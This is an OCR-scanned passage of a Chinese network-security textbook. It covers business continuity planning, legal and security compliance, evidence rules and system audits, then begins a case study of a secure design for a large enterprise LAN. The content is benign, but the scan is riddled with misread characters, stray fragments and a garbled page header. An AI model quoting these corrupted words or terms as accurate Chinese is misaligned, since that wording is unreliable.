(3) 适当 考虑 购买 保险 ,可 以 将 其 作为 业务 连续 性 程序 的 一 部 分 。 


RERE 


LES 


网 络 安 全 与 信息 保障 


CD 制订 符合 商定 业务 目标 和 优先 级 别 的 业务 连续 性 战略 并 记录 在 案 。 

(5) 制订 符合 商定 战略 的 业务 连续 性 计划 并 记录 在 案 。 

(6) 定期 对 计划 和 程序 进行 检查 和 更 新 。 

(7) 确保 在 组 织 的 程序 和 结构 中 纳入 业务 连续 性 管理 。 业 务 连续 性 管理 程序 的 协调 责 
任 应 该 在 组 织 内 部 某 一 级 (如 信息 安全 讨论 会 ) 进 行 适当 分 配 。 

2. 业务 连续 性 和 影响 分 析 

要 确保 业务 连续 性 ,应 该 首先 确定 可 能 引起 业务 流程 中 断 的 事件 ,如 设备 故障 、 水 灾 和 
火灾 。 然 后 ,应 该 进行 风险 评估 ,确定 中 断 可 能 造成 的 影响 (破坏 程度 和 恢复 时 间 )。 这 两 项 
活动 都 应 让 业务 资源 和 流程 的 所 有 者 完全 参与 。 此 项 评估 涉及 所 有 业务 流程 ,不 只 局 限于 
信息 处 理 设 施 。 

应 该 根据 风险 评估 结果 制订 相应 的 战略 计划 ,确定 业务 连续 性 总 体 方案 。 计 划 制 订 后 
应 该 由 管理 层 进行 批准 。 

3. 编写 和 实施 连续 性 计划 

应 该 制订 计划 维护 业务 运作 ,或 在 重要 业务 流程 中 断 或 发 生 故障 后 在 规定 时 间 内 恢复 
业务 运作 。 业 务 连续 性 计划 程序 应 该 考虑 以 下 内 容 。 

(1) 确定 并 认可 各 项 责任 和 应 急 程 序 。 

(2) 执行 应 急 程序 ,以 便 在 规定 时 间 内 进行 恢复 。 要 特别 注意 对 有 关外 部 业务 和 合同 
的 评估 。 

(3) 商定 程序 的 备案 。 

(4) 适当 地 对 员工 进行 培训 ,让 他 们 了 人 解 包括 危机 管理 在 内 的 商定 应 急 程 序 ; 检查 并 
更 新 计划 。 

(5) 计划 程序 应 着 重 强调 要 求 的 业务 目标 ,如 在 可 接受 的 时 间 内 恢复 向 客户 提供 的 具 
体 服务 。 为 此 ,应 该 考虑 所 需 服务 和 资源 ,包括 人 员 、 非 信息 处 理 资源 以 及 信息 处 理 设施 的 
低 效 运行 安排 。 

4. 业务 连续 性 计划 框架 

应 该 维护 一 个 业务 连续 性 计划 的 框架 ,保证 所 有 计划 前 后 一 致 ,确定 测试 和 维护 的 优先 
级 别 。 每 个 业务 连续 性 计划 都 应 该 详细 说 明 计划 执 行 的 条 件 以 及 执行 每 一 部 分 计划 的 负责 
人 员 。 确 定 新 的 要 求 时 ,应 该 对 已 制定 的 应 急 程 序 ( 如 朴 散 计划 或 现 有 的 低 效 运行 安排 ) 适 
当 进 行 修改 。 

业务 连续 性 计划 框架 应 该 考虑 以 下 内 容 : 

CD 计划 执行 条 件 。 在 计划 执行 前 说 明 要 采用 的 程序 (情况 评估 办 法 ,参与 人 员 等 )。 

(2) 应 急 程序 。 说 明 在 发 生 危 及 业务 操作 和 /或 生命 的 事故 后 要 采取 的 措施 。 还 应 该 
包括 公共 关系 管理 方面 的 安排 以 及 与 相应 政府 机 构 ( 如 警察 .消防 和 当地 政府 ) 保 持 有 效 联 
系 地 安排 。 

CD 低 效 运行 程序 。 说 明 应 该 采取 哪些 措施 ,以 将 重要 业务 活动 或 支持 服务 转移 到 其 
他 临时 地 点 并 在 规定 时 间 内 恢复 业务 流程 。 

(4) 恢复 程序 。 说 明 应 该 采取 哪些 措施 ,以 恢复 正常 业务 运作 。 

(5) 说 明 计划 检查 方式 和 时 间 的 维护 计划 以 及 计划 维护 程序 。 

(6) 宣传 培训 活动 。 旨 在 让 人 们 了 解 业务 连 续 性 程序 ,保证 这 些 程序 始终 有 效 。 


C) 个 人 责任 。 说 明 由 谁 负 责 执行 哪 一 部 分 计划 。 根 据 要 求 应 该 指定 备 选 方案 。 

(8) 每 个 计划 都 应 该 有 一 个 所 有 者 。 应 急 程 序 . 采 用 人 工 进行 的 低 效 运行 计划 以 及 恢 
复 计 划 都 应 该 由 拥有 相应 业务 资源 或 程序 的 人 负责 。 备 用 技术 服务 的 低 效 运行 安排 (如 信 
息 处 理 和 通信 设施 ) 通 常 应 该 由 服务 提供 商 负责 。 

5. 业务 连续 性 计划 的 检查 ,维护 和 重新 分 析 

(1) 计划 的 检查 

业务 连续 性 计划 常常 由 于 错误 估计 、 疏 忽 或 设备 (人 员 ) 的 变化 可 能 无 法 通过 检查 。 因 
此 ,应 该 对 计划 进行 定期 检查 ,保证 其 新 颖 性 和 有 效 性 。 进 行 此 类 检查 时 ,还 应 该 保证 负责 
进行 恢复 的 所 有 小 组 成 员 以 及 其 他 相关 人 员 对 计划 有 一 定 的 了 解 。 

业务 连续 性 计划 的 检查 计划 应 该 说 明 各 部 分 计划 的 检查 方式 和 时 间 , 建 议 对 计划 各 部 
分 进行 频繁 检查 。 应 该 采用 各 种 技术 ,确保 计划 的 实际 运作 。 这 些 技术 包括 : 对 各 种 情况 
进行 公开 检查 (利用 中 断 示例 讨论 业务 恢复 方面 的 安排 ); 模拟 (尤其 用 来 对 负责 事故 /危机 
发 生 后 管理 的 人 员 进 行 培训 ) ; 技术 恢复 的 检查 (保证 信息 系统 能 够 有 效 恢复 ); 备用 场地 
恢复 的 检查 (继续 业务 流程 ,同时 在 主要 场地 外 执行 恢复 操作 ); 供应 商 提供 的 设施 和 服务 
的 检查 (确保 外 部 提供 的 服务 和 产品 符合 合同 中 的 规定 ); 全 面 演 习 ( 检 查 组 织 、 人 员 ,设备 、 
设施 和 程序 是 否 能 够 应 付 中 断 情况 ) ,技术 可 以 由 任何 组 织 使 用 ,应 该 反映 具体 恢复 计划 的 

(20 计划 的 维护 和 重新 分 析 

应 该 通过 定期 审议 和 更 新 对 业务 连续 性 计划 进行 维护 ,确保 其 始终 有 效 。 应 该 在 组 织 
的 变更 管理 计划 中 采用 适当 程序 ,确保 业务 连续 性 问题 得 到 适当 处 理 。 

应 该 分 配 各 个 业务 连续 性 计划 的 定期 评审 责任 ; 业务 连续 性 计划 更 新 后 ,应 该 检查 还 
有 哪些 业务 安排 变动 尚未 在 该 计划 中 得 以 反映 。 该 正式 变更 控制 程序 还 应 该 确保 把 更 新 计 
划分 发 下 去 ,而 且 在 对 完整 计划 进行 定期 审议 后 更 新 计划 更 加 完 

需要 更 新 计划 的 情况 示例 包括 购买 新 设备 或 操作 系统 升级 以 及 在 以 下 方面 发 生 的 
变动 : 

DAR. 

© 地 址 或 电话 号 码 。 

© 经 营 战略 。 

@ 场所 \ 设 施 和 资源 。 

© 法 律 法 规 。 

© 承包 商 \ 供 应 商 和 主要 客户 。 

CD 流程 ,或 新 的 流程 /废止 的 流程 。 

图 风险 (操作 风险 和 金融 风险 ) 。 


7.10 符 合 性 


符合 性 要 求 的 目标 是 不 违反 刑法 、 民 法 、 成 文法 法 规 或 合约 义务 ,以 及 任何 安全 要 求 。 
信息 系统 的 设计 、 操 作 、 使 用 和 管理 要 依据 成 文法 、 法 规 或 合同 安全 的 要 求 。 应 该 向 组 织 的 
法 律 顾问 或 合格 的 律师 咨询 关于 具体 法 律 要 求 的 建议 。 法 律 要 求 各 国 不 一 ,有 关 在 一 国 创 
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建 而 传输 到 另 一 国 的 信息 ( 即 跨国 界 数据 流动 ) 的 法 律 要 求 也 不 尽 相同 。 

对 每 一 个 信息 系统 都 应 该 明确 规定 所 有 相关 法 律 法 规 要 求 和 合约 要 求 并 进行 备案 。 满 
足 这些 要 求 的 具体 控制 措施 和 个 人 责任 同样 应 该 进行 规定 和 备案 。 

1. 知识 产权 APR) 

(1) 版 权 

应 该 采用 适当 的 程序 ,保证 符合 有 关 涉及 知识 产权 (如 版 权 . 设 计 权 或 商标 ) 的 材料 使 用 
的 法 律 限 制 。 侵 犯 版 权 可 能 引发 法 律 诉讼 ,甚至 引发 刑事 诉讼 。 

法 律 法 规 和 合约 要 求 可 以 对 专利 材料 的 复制 予以 限制 。 特 别 是 ,可 以 要 求 仅 能 使 用 组 
织 内 部 编制 的 材料 或 经 编写 人 员 向 组 织 授权 或 提供 的 材料 。 

(2) 软件 版 权 

专 有 软件 产品 通常 根据 许可 协议 提供 。 许 可 协议 仅 限 产 品 在 指定 机 器 上 使 用 ,复制 仅 
限于 创建 备份 副本 。 应 该 考虑 采用 以 下 控制 措施 : 

CD 出 台 软 件 版 权 符合 性 策略 ,对 合法 使 用 软件 和 信息 产品 进行 明确 规定 。 

@ 签发 用 于 规范 获得 软件 产品 的 程序 的 标准 。 

@ 宣传 软件 版 权 和 采购 策略 ,并 通告 要 对 违反 策略 的 员工 采取 惩罚 性 措施 。 

@ 维护 适当 的 资产 登记 制度 。 

C) 保留 许可 证 所 有 权 、 原 版 磁盘 、 手 册 等 的 证 据 和 证 明 。 

© 执行 控制 措施 ,保证 不 超过 允许 最 大 用 户 数 。 

CD 检查 确保 只 安装 了 授权 软件 和 许可 产品 。 

@ 提供 适当 许可 条 件 的 维护 策略 。 

向 别人 提供 处 置 或 转让 软件 的 策略 。 

D 使 用 适当 的 审计 工具 。 

D 符合 从 公用 网 获取 软件 和 信息 的 条 款 和 条 件 。 

2. 组 织 记 录 的 安全 保障 

应 该 防止 组 织 的 重要 记录 丢失 .毁坏 和 窜改 。 某 些 记录 必须 妥善 保管 ,以 符合 法 律 法 规 
要 求 , 有 利于 重要 的 业务 活动 。 此 类 记录 举例 如 下 : 可 以 要 求 作为 证 据 证 明 组 织 运 作 符合 
法 律 法 规 规定 的 记录 ,或 者 可 以 确保 能 充分 防范 发 生 潜在 的 民事 诉讼 或 刑事 诉讼 的 记录 ,或 
者 可 以 向 股东 、 合 作 伙 伴 和 审计 人 员 证 实 组 织 财 务 状况 的 记录 。 信 息 保 管 的 时 间 和 数据 内 
容 应 根据 国家 法 律 法 规 而 定 。 

记录 应 该 按 记 录 类 型 (会 计 记 录 .数据 库 记 录 、 事 务 日 志 、 审 计 日 志和 操作 程序 ) 进 行 分 
类 ,每 种 都 应 说 明 详 细 的 保管 时 间 和 存储 介质 类 型 (如 纸 质 缩微 胶片 .磁性 材料 或 光学 材 
料 )。 与 加 密 档 案 或 数字 签名 有 关 的 任何 相关 加 密 密 钥 都 应 该 妥 为 保存 ,并 在 需要 时 向 授权 
人 员 提 供 。 

应 考虑 用 于 存储 记录 的 介质 出 现 性 能 下 降 的 可 能 性 。 应 该 根据 制造 商 建议 采用 存储 和 
处 理 程 序 。 

如 选择 电子 存储 介质 , 则 应 该 采用 能 够 在 整个 保管 期 间 访 问 数据 (包括 介质 和 格式 可 读 
性 ?的 程序 ,保证 不 会 由 于 未 来 技术 上 发 生 的 变化 而 导致 数据 丢失 。 

应 该 选择 适当 的 数据 存储 系统 ,保证 所 需 数 据 可 以 按照 法 院 认 可 的 方式 进行 检索 ,如 所 
需 全 部 记录 可 以 在 认可 时 间 内 以 认可 的 格式 进行 检索 。 


存储 和 处 理 系统 应 该 确保 能 够 清楚 识别 记录 以 及 法 律 法 规 规定 的 保管 期 。 还 应 该 规 
JE ,在 保管 期 满 后 如 果 组 织 不 再 需要 记录 , 则 可 以 采用 适当 的 方式 予以 销毁 。 

为 了 履行 这 些 义 务 ,应 该 在 组 织 内 采取 以 下 步 又。 

CD. 应 该 对 记录 和 信息 的 保管 .存储 ` 处 理 和 处 置 签发 指导 原则 。 

(2) 应 该 制订 确定 记录 类 型 和 保管 时 间 的 保管 计划 。 

(3) 应 该 维护 关键 信息 来 源 目 录 。 

(4) 应 该 采用 适当 的 控制 措施 ,保护 重要 的 记录 和 信息 ,防止 丢失 ,破坏 和 帘 改 。 

3. 个 人 信息 的 数据 保护 和 安全 

有 一 些 国 家 已 经 制定 了 相应 法 律 , 对 个 人 数据 (一 般 为 有 关 可 以 据 以 识别 的 活着 的 个 人 
的 信息 ) 的 处 理 和 传输 进行 控制 。 此 类 控制 措施 可 以 对 收集 .处 理 、 传 播 个 人 信息 者 施加 责 
任 限制 ,也 可 以 对 他 国 传输 该 数据 的 权限 加 以 限制 。 

要 符合 数据 保护 法 律 , 就 需要 有 适当 的 管理 结构 和 控制 。 这 通常 可 以 通过 委任 数据 保 
护 官员 而 实现 。 此 人 应 该 就 个 人 职责 以 及 应 该 遵循 的 具体 程序 向 管理 员 、 用 户 和 服务 提供 
商 提 供 指 导 。 此 类 数据 的 所 有 者 应 该 向 数据 保护 官员 报告 在 结构 化 文件 中 保存 个 人 信息 的 
提议 ,应 该 确保 知晓 相关 法 律 中 规定 的 数据 保护 原则 。 

4. 防止 信息 处 理 设施 的 滥用 

组 织 的 信息 处 理 设施 用 于 业务 目的 。 管 理 层 应 该 批准 对 信息 处 理 设施 的 使 用 。 在 没有 征 
得 管理 层 同 意 的 情况 下 ,对 这 些 设 施 进 行 任何 非 业 务 或 非法 使 用 都 会 视 为 是 对 设施 的 不 当 使 
用 。 如 果 此 类 活动 通过 监控 或 其 他 方法 发 现 , 则 应 该 引起 负责 采取 适当 惩罚 措施 的 经 理 的 重视 。 

监控 使 用 情况 的 法 律 各 国 不 一 ,可 以 要 求 员工 必须 对 有 关 此 类 监控 方法 知情 或 者 得 到 员 
工 的 同意 。 执 行 监控 程序 前 应 该 寻求 法 律 建议 。 许 多 国家 已 经 或 正在 制定 相应 法 律 ,以 防止 
对 计算 机 的 滥用 。 计 算 机 用 于 非法 目的 ,可 以 构成 刑事 犯罪 。 所 以 ,所 有 用 户 都 必须 了 解 允许 
的 确切 访问 范围 。 这 可 以 通过 向 用 户 提供 书面 授权 而 得 以 实现 。 授 权 副本 应 由 用 户 签字 并 交 
组 织 妥 为 保管 。 组 织 的 员工 和 第 三 方 用 户 都 应 该 知晓 不 经 授权 不 得 进行 任何 访问 的 规定 。 

登录 时 计算 机 屏幕 上 应 该 显示 警告 消息 ,说 明 进 入 的 系统 是 专用 系统 ,不 允许 非法 访 
问 。 用 户 必须 认可 屏幕 上 的 消息 并 做 出 适当 反应 ,然后 继续 登录 。 

5. 加 密 控制 措施 的 调整 

一 些 国 家 已 经 有 了 相应 的 协议 .法律 法 规 或 其 他 手段 来 对 访问 或 口令 控制 措施 的 使 用 
进行 控制 。 此 类 控制 措施 包括 以 下 内 容 : 

(1) 进口 和 /或 出 口 用 于 执行 加 密 功能 的 计算 机 硬件 和 软件 。 

(2) 专门 增加 了 加 密 功 能 的 计算 机 硬件 和 软件 的 进口 和 /或 出 口 。 

(3) 国家 为 提供 内 容 安全 而 对 软 硬 件 加 密 信息 的 强制 性 或 选择 性 访问 方法 。 

(4) 应 该 寻求 法 律 建议 ,确保 遵守 国家 法 律 ,将 加 密 信息 或 加 密 控 制 措施 输入 另 一 个 国 
家 之 前 ,也 应 寻求 法 律 建议 。 

6. 证 据 收集 

(1) 证 据 的 规则 

对 个 人 或 组 织 提 起 诉讼 时 ,必须 要 有 足够 的 证 据 。 只 要 诉讼 为 内 部 约束 事务 ,必要 的 证 
据 就 要 通过 内 部 程序 进行 说 明 。 

如 果 采 取 的 行动 涉及 法 律 ,不 论 是 民法 还 是 刑法 , 则 所 提供 的 证 据 应 该 符合 相关 法 律 或 
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本 案 受 理 法 庭 的 条 例 对 证 据 的 规定 。 一 般 情况 下 ,这 些 规则 包括 以 下 内 容 : 

CD 证 据 的 可 采 性 : 证 据 是 否 可 以 在 法 庭 上 使 用 。 

© 证 据 的 份量 : 证 据 的 质量 和 完整 性 。 

@ 过 程控 制 证 据 : 在 系统 存储 和 处 理 待 收集 证 据 期 间 一 贯 正确 地 实施 控制 措施 的 充 
分 证 据 。 

(2) 证 据 的 可 采 性 

要 实现 证 据 的 可 采 性 ,组 织 应 该 保证 其 信息 系统 符合 有 关 出 示 可 采 证 据 的 公布 标准 或 
通用 法 规 。 

(3) 证 据 的 质量 和 完整 性 

要 确保 证 据 的 质量 和 完整 性 ,需要 能 提供 有 力 的 证 据 线 索 。 一 般 情况 下 ,可 以 根据 以 下 
条 件 找 到 有 力 的 证 据 线 索 。 

CD 书面 文件 : 原件 要 妥 为 保管 ,要 记录 发 现 人 、 发 现 地 点 、 发 现时 间 和 发 现时 在 场 证 
人 。 任 何 调查 都 应 该 确保 不 算 改 原件 。 

© 关于 计算 机 介质 的 信息 : 对 任何 活动 介质 \ 硬 盘 上 信息 或 内 存 中 信息 应 该 进行 复 
制 , 以 保证 其 可 用 性 。 应 该 对 复制 过 程 中 的 所 有 活动 保留 日 志 记录 ,而 且 应 该 有 人 作证 。 应 
该 妥善 保管 一 份 介质 和 日 志 的 副本 。 

© 刚 了 解 到 发 生 事件 时 ,可 能 还 无 法 明确 知道 它 是 否 可 能 引起 法 律 诉讼 。 因 此 ,在 意 
识 到 事件 的 严重 性 之 前 存在 必要 证 据 无 意 被 破坏 的 危险 。 建 议 在 任何 可 能 的 法 律 诉讼 初期 
让 律师 或 警察 参与 进来 ,对 所 需 证 据 提 供 建 议 。 

7. 安全 策略 和 技术 符合 性 的 评审 

安全 策略 和 技术 符合 性 的 评审 的 目标 是 保证 系统 符合 组 织 的 安全 策略 和 标准 。 应 该 对 
信息 系统 的 安全 进行 定期 评审 。 应 该 根据 适当 的 安全 策略 进行 此 类 评审 ,还 应 该 对 技术 平 
台 和 信息 系统 是 否 符合 安全 实施 标准 进行 审计 。 

(1) 符合 安全 策略 

管理 员 应 该 确保 正确 执行 其 职责 范围 内 的 安全 程序 。 另 外 ,应 该 对 组 织 内 的 各 个 方面 
进行 定期 评审 ,保证 其 符合 安全 策略 和 标准 。 应 该 包括 信息 系统 ; 系统 供应 商 ; 信息 和 信 
息 资产 的 所 有 者 ; 用 户 ; 管理 层 。 

信息 系统 所 有 者 应 该 支持 定期 评审 ,确保 系统 符合 适当 的 安全 策略 ,标准 和 其 他 安全 要 
求 。 有 关系 统 使 用 情况 的 操作 监控 。 

(2) 技术 符合 性 检查 

应 该 定期 检查 信息 系统 是 否 符合 安全 实施 标准 。 技 术 符 合 性 检查 涉及 对 操作 系统 的 检 
查 , 保 证 硬件 和 软件 控制 措施 得 以 正确 执行 。 这 种 符合 性 检查 要 求 有 专家 的 技术 帮助 ,应 该 
由 一 位 有 经 验 的 系统 工程 师 手 动 进行 此 项 检查 (根据 需要 可 辅 之 以 适当 的 软件 工具 ) ,或 由 
一 个 自动 化 软件 包 来 执行 ,之 后 再 由 技术 专家 对 该 软件 包 生 成 的 技术 报告 进行 解释 。 

符合 性 检查 还 涉及 渗透 测试 ,可 由 专门 负责 此 项 任务 的 专家 独立 执行 。 这 对 于 检测 系 
统 漏 洞 可 能 十 分 有 用 ,而 且 对 为 防止 这 些 漏 洞 引起 的 非法 访问 所 采取 控制 措施 的 有 效 性 进 
行 检查 时 也 十 分 有 用 。 应 该 十 分 并 慎 , 以 免 渗 透 测试 虽然 成 功 ,但 却 导致 系统 的 安全 受到 影 
响 , 无 意 中 引 起 了 其 他 系统 漏洞 。 

任何 技术 符合 性 检查 都 应 由 合格 的 授权 人 员 或 在 其 监督 下 完成 。 


8. 系统 审计 因素 

系统 审计 的 目标 是 最 大 限度 地 提高 有 效 性 ,最 大 程度 地 减少 系统 审计 过 程 的 干扰 。 在 
系统 审计 过 程 中 ,应 该 采取 适当 的 控制 措施 保障 操作 系统 和 审计 工具 的 安全 ,同时 还 要 求 采 
取保 护 措施 保障 审计 工具 的 完整 性 ,防止 滥用 。 

(1) 系统 审计 控制 措施 

应 该 认真 地 对 涉及 操作 系统 检查 的 审计 要 求 和 活动 制订 计划 并 达成 一 致 ,以 最 大 限度 
地 降低 业务 流程 中 断 的 风险 。 应 该 符合 以 下 要 求 : 

CD 审计 要 求 应 该 与 适当 的 管理 相 一 致 。 

@ 应 该 就 检查 范围 达成 一 致 并 进行 控制 。 

@ 检查 应 该 只 限于 软件 和 数据 的 只 读 访 问 。 

@ 只 允许 对 系统 文件 的 单独 副本 进行 非 只 读 访问 ,审计 结束 时 应 将 其 清除 。 

C) 应 该 明确 确定 执行 检查 的 IT 资源 并 保证 其 资源 可 利用 。 

© 应 该 明确 特殊 处 理 或 额外 处 理 要 求 并 达成 一 致 。 

@ 应 该 对 所 有 访问 进行 监控 和 记录 ,以 提供 参考 线索 。 

@ 应 该 对 所 有 程序 要 求 和 责任 进行 备案 。 

(2) 系统 审计 工具 的 保护 

对 系统 审计 工具 ( 即 软件 或 数据 文件 ) 的 访问 应 该 加 以 保护 ,以 防止 任何 可 能 的 滥用 或 
危害 ; 此 类 工具 应 该 与 开发 系统 和 操作 系统 分 开 ; 不 提供 适当 的 额外 保护 ,就 不 应 存储 在 
磁带 库 或 用 户 。 
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8.1 方案 概述 


本 方案 为 某 大 型 局 域 网 网 络 安 全 解决 方案 ,包括 原 有 网 络 系统 分 析 、 安 全 需求 分 析 、 安 
全 目标 的 确立 、 安 全 体系 结构 的 设计 等 。 本 安全 解决 方案 的 目标 是 在 不 影响 某 大 型 企业 局 
域 网 当前 业务 的 前 提 下 ,实现 对 他 们 局 域 网 全 面 的 安全 管理 。 

(1) 将 安全 策略 .硬件 及 软件 等 方法 结合 起 来 ,构成 一 个 统一 的 防御 系统 ,有 效 阻止 非 
法 用 户 进 入 网 络 ,减少 网 络 的 安全 风险 。 

(2) 定期 进行 漏洞 扫描 ,审计 跟踪 ,及 时 发 现 问题 ,解决 问题 。 

(3) 通过 入 侵 检 测 等 方式 实现 实时 安全 监控 ,提供 快速 响应 故障 的 手段 ,同时 具备 很 好 
的 安全 取证 措施 。 

(4) 使 网 络 管理 者 能 够 很 快 重新 组 织 被 破坏 了 的 文件 或 应 用 程序 。 使 系统 重新 恢复 到 
破坏 前 的 状态 ,最 大 限度 地 减少 损失 。 

O) 在 工作 站 、 服 务 器 上 安装 相应 的 防 病毒 软件 ,由 中 央 控 制 台 统一 控制 和 管理 ,实现 
全 网 统一 防 病毒 。 


8.2 网 络 概况 


这 个 企业 的 局 域 网 是 一 个 信息 点 较为 密集 的 千 兆 局 域 网 络 系统 , 它 所 连接 的 现 有 上 千 
个 信息 点 为 在 整个 企业 内 办 公 的 各 部 门 提供 了 一 个 快速 .方便 的 信息 交流 平台 。 不 仅 如 此 ， 
通过 专线 与 Internet 的 连接 ,打通 了 一 扇 通 向 外 部 世界 的 窗户 ,各 个 部 门 可 以 直接 与 因特网 
用 户 进行 交流 ,查询 资料 等 。 通 过 公开 服务 器 ,企业 可 以 直接 对 外 发 布 信息 或 发 送 电子 邮 
件 。 高 速 交换 技术 的 采用 、 灵 活 的 网 络 互联 方案 设计 为 用 户 提供 快速 ` 方 便 ` 灵 活 通信 平台 
的 同时 ,也 为 网 络 的 安全 带 来 了 更 大 的 风险 。 因 此 ,在 原 有 网 络 上 实施 一 套 完整 .可 操作 的 
安全 解决 方案 不 仅 是 可 行 的 ,而 且 是 必需 的 。 


8.2.1 网 络 概述 


这 个 企业 的 局 域 网 ,物理 跨度 不 大 ,通过 千 兆 交换 机 在 主干 网 络 上 提供 1000MB 的 独 享 
带宽 ,通过 下 级 交换 机 与 各 部 门 的 工作 站 和 服务 器 连接 ,并 为 之 提供 100MB 的 独 享 带宽 。 
利用 与 中 心 交换 机 连接 的 Cisco 路 由 器 ,所 有 用 户 可 直接 访问 Internet; 


8.2.2 网 络 结构 


这 个 企业 的 局 域 网 按 访 问 区 域 可 以 划分 为 3 个 主要 的 区 域 : Internet 区 域 .内 部 网 络 、 
公开 服务 器 区 域 。 内 部 网 络 又 可 按照 所 属 的 部 门 、. 职 能 、 安 全 重要 程度 分 为 许多 子 网 ,包括 
财务 子 网 .领导 子 网 ,办 公子 网 ,市场 部 子 网 ,中心 服务 器 子 网 等 。 在 安全 方案 设计 中 ,基于 
安全 的 重要 程度 和 要 保护 的 对 象 ,可 以 在 Catalyst 型 交换 机 上 直接 划分 4 个 虚拟 局 域 网 
(CVLAN), 即 中 心服 务 器 子 网 财务 子 网 .领导 子 网 其 他 子 网 。 不 同 的 局 域 网 分 属 不 同 的 广 
播 域 ,由 于 财务 子 网 ,领导 子 网 ,中 心服 务 器 子 网 属于 重要 网 段 , 因 此 在 中 心 交 换 机 上 将 这 些 
网 段 各 自 划分 为 一 个 独立 的 广播 域 ,而 将 其 他 的 工作 站 划分 在 一 个 相同 的 网 段 。 


8.2.3 网 络 应 用 


这 个 企业 的 局 域 网 可 以 为 用 户 提供 如 下 主要 应 用 : 

CD. 文件 共享 、 办 公 自 动 化 .WWW 服务 、 电 子 邮 件 服务 ; 

(2) 文件 数据 的 统一 存储 ; 

(3) 针对 特定 的 应 用 在 数据 库 服 务 器 上 进行 二 次 开发 (如 财务 系统 ); 
(4) 提供 与 Internet 的 访问 ; 

(5) 通过 公开 服务 器 对 外 发 布 企 业 信息 ,发 送 电 子 邮件 等 。 


8.2.4 网 络 结构 的 特点 


在 分 析 这 个 企业 局 域 网 的 安全 风险 时 ,应 考虑 到 网 络 结构 的 特点 如 下 : 

(1) 网 络 与 Internet 直接 连接 ,因此 在 进行 安全 方案 设计 时 要 考虑 与 Internet 连接 的 
有 关 风 险 ,包括 可 能 通过 Internet 传播 进来 病毒 ,黑客 攻击 ,来 自 Internet 的 非 授 权 访 问 等 。 

(2) 网 络 中 存在 公开 服务 器 ,由 于 公开 服务 器 对 外 必须 开放 部 分 业务 ,因此 在 进行 安全 
方案 设计 时 应 该 考虑 采用 安全 服务 器 网 络 ,避免 公开 服务 器 的 安全 风险 扩散 到 内 部 网 络 。 

(3) 内 部 网 络 中 存在 许多 不 同 的 子 网 ,不 同 的 子 网 有 不 同 的 安全 性 ,因此 在 进行 安全 方 
案 设 计时 ,应 考虑 将 不 同 功 能 和 安全 级 别 的 网 络 分 割 开 ,这 可 以 通过 交换 机 划分 VLAN 来 
实现 。 

(4) 网 络 中 有 2 台 应 用 服务 器 ,在 应 用 程序 开发 时 就 应 考虑 加 强 用 户 登 录 验 证 ,防止 非 
授权 的 访问 。 

总 而 言 之 ,在 进行 网 络 方案 设计 时 ,应 综合 考虑 到 这 个 企业 局 域 网 的 特点 ,根据 产品 的 
性 能 、 价 格 潜在 的 安全 风险 进行 综合 考虑 。 


8.3 网 络 系统 安全 风险 分 析 


随 着 Internet 网 络 急剧 扩大 和 上 网 用 户 迅 速 增加 ,风险 变 得 更 加 严重 和 复杂 。 原 来 由 
单个 计算 机 安全 事故 引起 的 损害 可 能 传播 到 其 他 系统 ,引起 大 范围 的 瘫痪 和 损失 ; 加 上 缺 
乏 安 全 控制 机 制 和 对 Internet 安全 政策 的 认识 不 足 , 这 些 风险 正 日 益 严重 。 

针对 这 个 企业 局 域 网 中 存在 的 安全 隐患 ,在 进行 安全 方案 设计 时 ,下 述 安全 风险 必须 要 
认真 考虑 ,并 且 要 针对 面临 的 风险 ,采取 相应 的 安全 措施 。 下 述 安 全 风险 由 多 种 因素 引起 ， 


大 型 企业 局 城 网 安 会 解决 方 侨 


第 
8 
章 


网 络 安 全 与 信息 保障 


与 这 个 企业 局 域 网 结构 和 系统 的 应 用 、 局 域 网 内 网 络 服务 器 的 可 靠 性 等 因素 密切 相关 。 下 
面 列 出 部 分 这 类 风险 因素 : 

1. 物理 安全 风险 分 析 

网 络 的 物理 安全 主要 是 指 地 震 \ 水 灾 、 火 灾 等 环境 事故 ; 电源 故障 ; 人 为 操作 失误 或 错 
误 ; 设备 被 资 ,被 毁 ; 电磁 干扰 ; 线路 截获 ,以 及 高 可 用 性 的 硬件 、 双 机 多 元 余 的 设计 、 机 房 
环境 及 报警 系统 、 安 全 意识 等 。 它 是 整个 网 络 系 统 安全 的 前 提 , 在 这 个 企业 局 域 网 内 ,由 于 
网 络 的 物理 跨度 不 大 ,只 要 制定 健全 的 安全 管理 制度 ,做 好 备份 ,并 且 加 强 网 络 设备 和 机 房 
的 管理 ,这 些 风险 是 可 以 避免 的 。 

2. 网 络 平台 的 安全 风险 分 析 

网 络 结构 的 安全 涉及 网 络 拓扑 结构 .网络 路 由 状况 及 网 络 的 环境 等 。 

(1) 公开 服务 器 面临 的 威胁 

这 个 企业 局 域 网 内 公开 服务 器 区 (WWW 、E-mail 等 服务 器 ) 作 为 公司 的 信息 发 布 平台 ， 
一 旦 不 能 运行 或 者 受到 攻击 ,对 企业 的 声誉 影响 巨大 。 同 时 公开 服务 器 本 身 要 为 外 界 服务 ， 
必须 开放 相应 的 服务 ; 每 天 ,黑客 都 在 试图 奖 入 Internet 节点 ,这 些 节 点 如 果 不 保持 警惕 ， 
可 能 连 黑客 怎么 问 入 的 都 不 知道 ,甚至 会 成 为 黑客 入侵 其 他 站 点 的 跳板 。 因 此 ,规模 比较 大 
的 网 络 管理 人 员 对 Internet 安全 事故 做 出 有 效 反 应 十 分 重要 。 有 必要 将 公开 服务 器 、 内 部 
网 络 与 外 部 网 络 进行 隔离 ,避免 网 络 结构 信息 外 泄 ;: 同时 还 要 对 外 部 网 络 的 服务 请 求 加 以 
过 滤 ,只 允许 正常 通信 的 数据 包 到 达 相 应 主机 ,其 他 的 请 求 服务 在 到 达 主 机 之 前 就 应 该 遭 到 
拒绝 。 

C2) 整个 网 络 结构 和 路 由 状况 

安全 的 应 用 往往 是 建立 在 网 络 系统 之 上 的 。 网 络 系统 的 成 熟 与 否 直接 影响 安全 系统 成 
功 的 建设 。 在 这 个 企业 局 域 网 络 系统 中 ,只 使 用 了 一 台 路 由 器 ,用 做 与 Internet 连接 的 边界 
路 由 器 ,网 络 结构 相对 简单 ,具体 配置 时 可 以 考虑 使 用 静态 路 由 ,这 就 大 大 减少 了 因 网 络 结 
构 和 网 络 路 由 造成 的 安全 风险 。 

3. 系统 的 安全 风险 分 析 

所 谓 系统 的 安全 ,是 指 整 个 局 域 网 网 络 操作 系统 、 网 络 硬件 平台 是 否 可 靠 且 值得 信任 。 

对 于 中 国 来 说 , 恺 怕 没 有 绝对 安全 的 操作 系统 可 以 选择 ,无 论 是 Microsoft 的 Windows 
